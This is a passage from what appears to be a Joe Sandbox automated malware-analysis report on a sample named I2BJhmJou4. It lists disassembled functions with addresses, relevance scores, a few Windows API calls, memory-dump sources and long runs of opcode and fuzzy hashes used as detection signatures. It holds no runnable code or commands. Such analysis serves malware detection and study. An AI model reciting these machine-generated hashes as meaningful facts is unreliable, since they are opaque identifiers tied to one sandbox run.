                                                          • Instruction ID: bb654dc0c729bd842e55c2d84f7a994ffa3bbf5d7aaa00ddc59bb9740fabb160
                                                          • Opcode Fuzzy Hash: adbb045383f3aff83bbbc2894185f14245fc57792bcce1406522dec350c50953
                                                          • Instruction Fuzzy Hash: C21182731102214BC720DF48CDC0AA773AAFB89718766026AD9445B711D17AECC7C7E4
                                                          Function 00424B24 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DestroyHeap
                                                          • String ID:
                                                          • API String ID: 2435110975-0
                                                          • Opcode ID: 91d73e85b2a2822530c45d3b6883030419f9aca911568a6b6bc4a0346bb9264a
                                                          • Instruction ID: 327f04a744b5650a880c0d17b4fb38287b6591765f983e0adcdd5822482b62ae
                                                          • Opcode Fuzzy Hash: 91d73e85b2a2822530c45d3b6883030419f9aca911568a6b6bc4a0346bb9264a
                                                          • Instruction Fuzzy Hash: D1119EB1900B848FD321CF69D845B9AFBF4FB49710F04C62AE8A897740D3786809CFA1
                                                          Function 0043CE89 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0003CFB3,0043C903), ref: 0043CE8E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: f735817a0b308c0274c4987da6a64f0c13ab2f4be108d509050ca7eb575e1a57
                                                          • Instruction ID: 47f33e16290772828d48e2fc5bbc638760d2d50ec684603df376a2e6b4d14c41
                                                          • Opcode Fuzzy Hash: f735817a0b308c0274c4987da6a64f0c13ab2f4be108d509050ca7eb575e1a57
                                                          • Instruction Fuzzy Hash:
                                                          Function 0041E6F0 Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: U
                                                          • API String ID: 0-3372436214
                                                          • Opcode ID: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
                                                          • Instruction ID: 920c4e3f9504e8d2d4b163527b25bc307261b88a0300f18b1f19330db72b497f
                                                          • Opcode Fuzzy Hash: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
                                                          • Instruction Fuzzy Hash: BF91D67D61C3018BDB249B5A84856BEBBE1BF85710F144C1FE9A9CB390D238D8C19B1B
                                                          Function 004126B9 Relevance: .8, Instructions: 751COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c69a6815894f7947a6a0542994c29682853ba558057bf9cd49837bbb9556ffd7
                                                          • Instruction ID: b4bf6b1535a8192db109e4eceafa1359732031e4ea1743c163b6d2ec44044536
                                                          • Opcode Fuzzy Hash: c69a6815894f7947a6a0542994c29682853ba558057bf9cd49837bbb9556ffd7
                                                          • Instruction Fuzzy Hash: 5762A1316087418FC715DF29C180AAAB7F1FF88304F14896EE4CA9B351D779E996CB4A
                                                          Function 0041D1E9 Relevance: .5, Instructions: 492COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 18e96e1bdeea36fde2e2a7c95cb4fe45291349101a4151a177f093f440f27f0c
                                                          • Instruction ID: c832cbe4cea19542036e1dfb563506aac7cc4c9f85c134abf1f95b4790773896
                                                          • Opcode Fuzzy Hash: 18e96e1bdeea36fde2e2a7c95cb4fe45291349101a4151a177f093f440f27f0c
                                                          • Instruction Fuzzy Hash: 301280B19087408FC324DF28C5816ABB7E2FF95314F144A2ED5D687B91E739E485CB4A
                                                          Function 0041204D Relevance: .5, Instructions: 486COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b682a163c1f03396e5c833ff429decc58d3793787ed165ced3494e9022131f5
                                                          • Instruction ID: 00b37b14bcf7e53a0711464c53c4ad7664543ad39541697e4ede5dfa319fd604
                                                          • Opcode Fuzzy Hash: 3b682a163c1f03396e5c833ff429decc58d3793787ed165ced3494e9022131f5
                                                          • Instruction Fuzzy Hash: EB124A75A087059FC714CF29C5806AAFBE1FF88304F14892EE899D7351D778E895CB8A
                                                          Function 02EE22B4 Relevance: .5, Instructions: 486COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4347f92868beb88931f2b4e7c9455e4ea7ed9a5ca3bc03ba5e233bd612ff6f32
                                                          • Instruction ID: b3f3e16bdfd01ad26aa628a05318ed1108a8a14e9208d2f4a15ff7abc345dce8
                                                          • Opcode Fuzzy Hash: 4347f92868beb88931f2b4e7c9455e4ea7ed9a5ca3bc03ba5e233bd612ff6f32
                                                          • Instruction Fuzzy Hash: DA127A75A087069FC714CF29C48066AFBE5FF88304F049A2EE99A87351DB74E855CF86
                                                          Function 0040D994 Relevance: .5, Instructions: 464COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 03cdce923c9e675f9e5ebb5a0dbb8409354af7752ec9be4cef3cf10354fd476d
                                                          • Instruction ID: 9c48d330d68db8a76f352aed59f264cc12ac867535c25307469f3d273e047ffe
                                                          • Opcode Fuzzy Hash: 03cdce923c9e675f9e5ebb5a0dbb8409354af7752ec9be4cef3cf10354fd476d
                                                          • Instruction Fuzzy Hash: 54F128B1E002098BDF288AA989915BFB6B1AF54310F25493FE015FF3D1E27D89458B5F
                                                          Function 02EDDBFB Relevance: .5, Instructions: 464COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 03cdce923c9e675f9e5ebb5a0dbb8409354af7752ec9be4cef3cf10354fd476d
                                                          • Instruction ID: 29bdca5c5fa1eab3e8c179a7400a34e7e32628e22e3f037a9e66cf4da95136ea
                                                          • Opcode Fuzzy Hash: 03cdce923c9e675f9e5ebb5a0dbb8409354af7752ec9be4cef3cf10354fd476d
                                                          • Instruction Fuzzy Hash: 62F14E72E805054BDF289E988D956FE7AB1AB85308F18F92BE005EF3D0E7758543CB52
                                                          Function 0041316D Relevance: .4, Instructions: 440COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef9f447ad74e91192cc3b01f303eb7ca3dc5ec1d29bfe9c2e6f9fbdfa1b176fd
                                                          • Instruction ID: a0aa4bf3e4d537a92ce93f9e726837fc264071e7a9162c3afbdc2585123e9ce0
                                                          • Opcode Fuzzy Hash: ef9f447ad74e91192cc3b01f303eb7ca3dc5ec1d29bfe9c2e6f9fbdfa1b176fd
                                                          • Instruction Fuzzy Hash: 70021270510B508FC338CF29C6905AABBF1BF45711B944A2EDAA787B90D739F985CB18
                                                          Function 02EE33D4 Relevance: .4, Instructions: 440COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9a42bc64a940a600b8496d0c65c55bde3d6951ff459c01317b1fbe73de1d0a5d
                                                          • Instruction ID: 8738675fa8ee5803d3cfc8a5e546b43cc627645ab54dc9a22b883d8160cf253a
                                                          • Opcode Fuzzy Hash: 9a42bc64a940a600b8496d0c65c55bde3d6951ff459c01317b1fbe73de1d0a5d
                                                          • Instruction Fuzzy Hash: E60232B0550B118FCB38CF29C58062ABBF1BF45714B94AA6DD6A787B90E736F448CB14
                                                          Function 0041E083 Relevance: .4, Instructions: 379COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
                                                          • Instruction ID: b31777eaf4445a5ca230d2489b0392e25bee96f51372df8947d9b7d5b3c35a4e
                                                          • Opcode Fuzzy Hash: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
                                                          • Instruction Fuzzy Hash: FAE1D179A083168FC714CF19C4D06AAB3E2BF99710F55892EED9587381D339E8868B85
                                                          Function 02EEE2EA Relevance: .4, Instructions: 379COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
                                                          • Instruction ID: 924cc6e34d2075dff59f48d0036344c0582d0fbfb0b61fab2dc9023b36a1920e
                                                          • Opcode Fuzzy Hash: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
                                                          • Instruction Fuzzy Hash: A7E1E2756487168FCB14CF18C4D066AB3E2FF88724F59992DE9D687381E335E84ACB81
                                                          Function 00429A5B Relevance: .3, Instructions: 346COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 363acbbdeab20fcea08c686e9da4600208a3b96b3fab0763692ee7983efd47cc
                                                          • Instruction ID: 7aad21176e94204ebf9be3326ef5f875fb6c76e3886be83ba2785e1930059451
                                                          • Opcode Fuzzy Hash: 363acbbdeab20fcea08c686e9da4600208a3b96b3fab0763692ee7983efd47cc
                                                          • Instruction Fuzzy Hash: CED1D1716083154FD30CCF5DC89532AFBE5ABC8710F4A892EE999DB3A1D6B8DC058B85
                                                          Function 00441057 Relevance: .3, Instructions: 344COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7d24e026ab002554a5cc82306c4c121f3aa2aa126a956a255deec92847530bab
                                                          • Instruction ID: 05fb3061c803852ccbcb55ec79df352ea4c9045d55e38e7908647069224f19b4
                                                          • Opcode Fuzzy Hash: 7d24e026ab002554a5cc82306c4c121f3aa2aa126a956a255deec92847530bab
                                                          • Instruction Fuzzy Hash: DAC1AF30A006468EFB24CF58C480AABB7B2BB09304F14465FD956D7BB1D778ADC6CB59
                                                          Function 0044234A Relevance: .3, Instructions: 344COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ee76e20e5c37595785789d759f783c4b647590ae66676044ba7df5895097dc4f
                                                          • Instruction ID: 86255bcc3f122f9cb2bdcdd6b3c86e7cac227984b0ae32171133bf816eefb62b
                                                          • Opcode Fuzzy Hash: ee76e20e5c37595785789d759f783c4b647590ae66676044ba7df5895097dc4f
                                                          • Instruction Fuzzy Hash: 0EC1EE70A006469FEB28CF28C69066FBBB1EF05304F94461FF85697391C7B8AD46CB59
                                                          Function 00410A33 Relevance: .3, Instructions: 313COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 22a249e8036389ca2a94441644932b39595e3d331b0a1c1fbadceed0361bbadf
                                                          • Instruction ID: be4b2c5f41c1c6b016d0662a1a3aa3dff1cc49737e4a0fee46609b29334a7491
                                                          • Opcode Fuzzy Hash: 22a249e8036389ca2a94441644932b39595e3d331b0a1c1fbadceed0361bbadf
                                                          • Instruction Fuzzy Hash: C3C18E716087518BC728CF1CC4903AEB7E2AFC4310F19CA2EE999D7795D7789881CB96
                                                          Function 00418413 Relevance: .3, Instructions: 279COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 13b49794fb555ce5a457b705e9d36dc15405e88024e94027de3508aab2a8635c
                                                          • Instruction ID: ecdb7d8b3c128cef4b5a8eef640ce4e1348b954c5e1c8cc4e6b72fcb2b8dd03a
                                                          • Opcode Fuzzy Hash: 13b49794fb555ce5a457b705e9d36dc15405e88024e94027de3508aab2a8635c
                                                          • Instruction Fuzzy Hash: 07C18F70608386AFC714CF28C84469ABFA1BF65304F04865EF8994B782D774DA68CB96
                                                          Function 00429730 Relevance: .2, Instructions: 246COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dc47058bb36163437909b73a5b85653ba8b3b080b3ce5340834d88d047b42e12
                                                          • Instruction ID: 33946987a401538ec29d146c49bd0777ead14b37c14ca5df7bbf2076656dae12
                                                          • Opcode Fuzzy Hash: dc47058bb36163437909b73a5b85653ba8b3b080b3ce5340834d88d047b42e12
                                                          • Instruction Fuzzy Hash: FB9116327041214FD35CDB3D8D66529FBE6ABC9244F49CA3EE08ACB292E974DA13C751
                                                          Function 004109FC Relevance: .2, Instructions: 210COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a39a2fe1fb783dc0ebd96aaa4b09021d3a3dec2b0e9adff76d855defd5a20da3
                                                          • Instruction ID: 2f1fa1f2c0ce5c767d39326a4a7df2626eefc8e715aa17eb357957d79dd35fa3
                                                          • Opcode Fuzzy Hash: a39a2fe1fb783dc0ebd96aaa4b09021d3a3dec2b0e9adff76d855defd5a20da3
                                                          • Instruction Fuzzy Hash: 7A8171716087518BC728CF2DC8906AEFBE2AFC4310F19CA2EE8D9D7795D6349881CB55
                                                          Function 0044915B Relevance: .2, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fcdd6333bcced19b981ab71a904a24c27a086616c56a7af56b535d3d20f827b4
                                                          • Instruction ID: 7f6a3678a30058b370d0d799ec085ce4703b2b826dd53e06f65c8239fe1aa67b
                                                          • Opcode Fuzzy Hash: fcdd6333bcced19b981ab71a904a24c27a086616c56a7af56b535d3d20f827b4
                                                          • Instruction Fuzzy Hash: FE516E71E00119AFEF04CF99C941AAFBBB2FF88304F19849DE815AB201C7749E51DB95
                                                          Function 02F193C2 Relevance: .2, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1f960195895d4523939b019740813820171c81770d6ce1acbb507da4b7e7694f
                                                          • Instruction ID: 86dfc752585121b1ce0471c607cf23470e7f2b07ccf3887f3e6825f9b23cf163
                                                          • Opcode Fuzzy Hash: 1f960195895d4523939b019740813820171c81770d6ce1acbb507da4b7e7694f
                                                          • Instruction Fuzzy Hash: 6E51A272E00119EFDF14CF99C951AEEBBB2EF88340F498059D905AB201C774AA50CB90
                                                          Function 02EF9ADA Relevance: .2, Instructions: 151COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 768c1d889d3b0b4dd139f02215e342ea367a32b8572c76f95433df72e755d40e
                                                          • Instruction ID: de9ed496828060945def11e817e7598d09d079133ac2fb2d8aa5c02de47949ab
                                                          • Opcode Fuzzy Hash: 768c1d889d3b0b4dd139f02215e342ea367a32b8572c76f95433df72e755d40e
                                                          • Instruction Fuzzy Hash: C551CE317080610FD39CE63D8967439BAE69BC9144B49CA7EE0DBCB692E875CA23C751
                                                          Function 00424995 Relevance: .1, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 14f6e479ba9ecabd101c7c373dc08ee6d0ff72b1ef0e7f0e2d8669747df763cc
                                                          • Instruction ID: 0a1bca97f873a7a6d6a3aaff04d58e0ae48002bfba7cab88bc6042a4b6745ab0
                                                          • Opcode Fuzzy Hash: 14f6e479ba9ecabd101c7c373dc08ee6d0ff72b1ef0e7f0e2d8669747df763cc
                                                          • Instruction Fuzzy Hash: F841F2726013149FD320DF15DC80B26B7E4FF84718F16452AED4587725E778F850CA99
                                                          Function 02EF4BFC Relevance: .1, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f1198482aff7cf87abae675dc4aebd9c7a23bf1f0da962c71c2e9c71d85cd782
                                                          • Instruction ID: 552c58f0e256ac759567cd4a1b47fa7ba6a7d0c5a91b14ea218517078f210773
                                                          • Opcode Fuzzy Hash: f1198482aff7cf87abae675dc4aebd9c7a23bf1f0da962c71c2e9c71d85cd782
                                                          • Instruction Fuzzy Hash: A441FEB25016048FE320DF15CC80B66B7E5FF85768F098128DF49837A4E735B890CAA1
                                                          Function 0043D8D0 Relevance: .1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction ID: affec256aca3101603e5e9c8b6c14aac85f880b69ce3fa9b32540f72830965cb
                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction Fuzzy Hash: 62113BF7A0104243D7058A2DF9B47B7D395EFCE320F2C626BD0514B758D12AE9459608
                                                          Function 00422817 Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 61e10354841268cd05691efce0a8c9eb762bb4252619a69a0da3101ddd28b7c0
                                                          • Instruction ID: c3a51ff81cd43cadc2f91b9d343c289a0ae24623370d929bafb0354b6f338a0e
                                                          • Opcode Fuzzy Hash: 61e10354841268cd05691efce0a8c9eb762bb4252619a69a0da3101ddd28b7c0
                                                          • Instruction Fuzzy Hash: F61194B66002147FE3006F69DC85E27BADCEB44354F45817AFD089B212D639ED14C6A5
                                                          Function 02EF2A7E Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 667bd2f19aee6fa7d81c4cb481a3f51af8e19f63dc029046603eb54790070f8a
                                                          • Instruction ID: 6799c533226c6d67686e8c7f439923387554fb29cbd48cd71293d2a10ca56269
                                                          • Opcode Fuzzy Hash: 667bd2f19aee6fa7d81c4cb481a3f51af8e19f63dc029046603eb54790070f8a
                                                          • Instruction Fuzzy Hash: AC11A3B2600248AFE344AF69CC84E67FADDEB48254F45C179FE089B252D635ED148A61
                                                          Function 00426A42 Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 66ff2f2a13dd8e2f3e7900633aa22c2d0bddf0cea2b0e0fcf3d4903cf0c1afe8
                                                          • Instruction ID: 775a38982ecc14386774c10a2ff7988f4febef0241ab9f2fac4c7ed0a075f983
                                                          • Opcode Fuzzy Hash: 66ff2f2a13dd8e2f3e7900633aa22c2d0bddf0cea2b0e0fcf3d4903cf0c1afe8
                                                          • Instruction Fuzzy Hash: 5F21AF71A002268FCB24CF58C890B6BB7B1FF86708F69865DC8066B342D775EC42CB95
                                                          Function 00410218 Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c0cbf25b4c85234f202655fa8cc2e504dfd54c569fa544efbece1cc302c4c175
                                                          • Instruction ID: 5cf5f964e5d4fdf4ab25e9de6bfd162346dccf7c83c49c61d1a40ba7c9897cbe
                                                          • Opcode Fuzzy Hash: c0cbf25b4c85234f202655fa8cc2e504dfd54c569fa544efbece1cc302c4c175
                                                          • Instruction Fuzzy Hash: 36118A77A1827107D711CE759CE021AF7629BC622270F4376D981AB352C170EC5892D9
                                                          Function 00429EF7 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
                                                          • Instruction ID: 5e6f75d6069618f27f4e8ece13d34dcb27fa1cb4973037488a19f9399b438bca
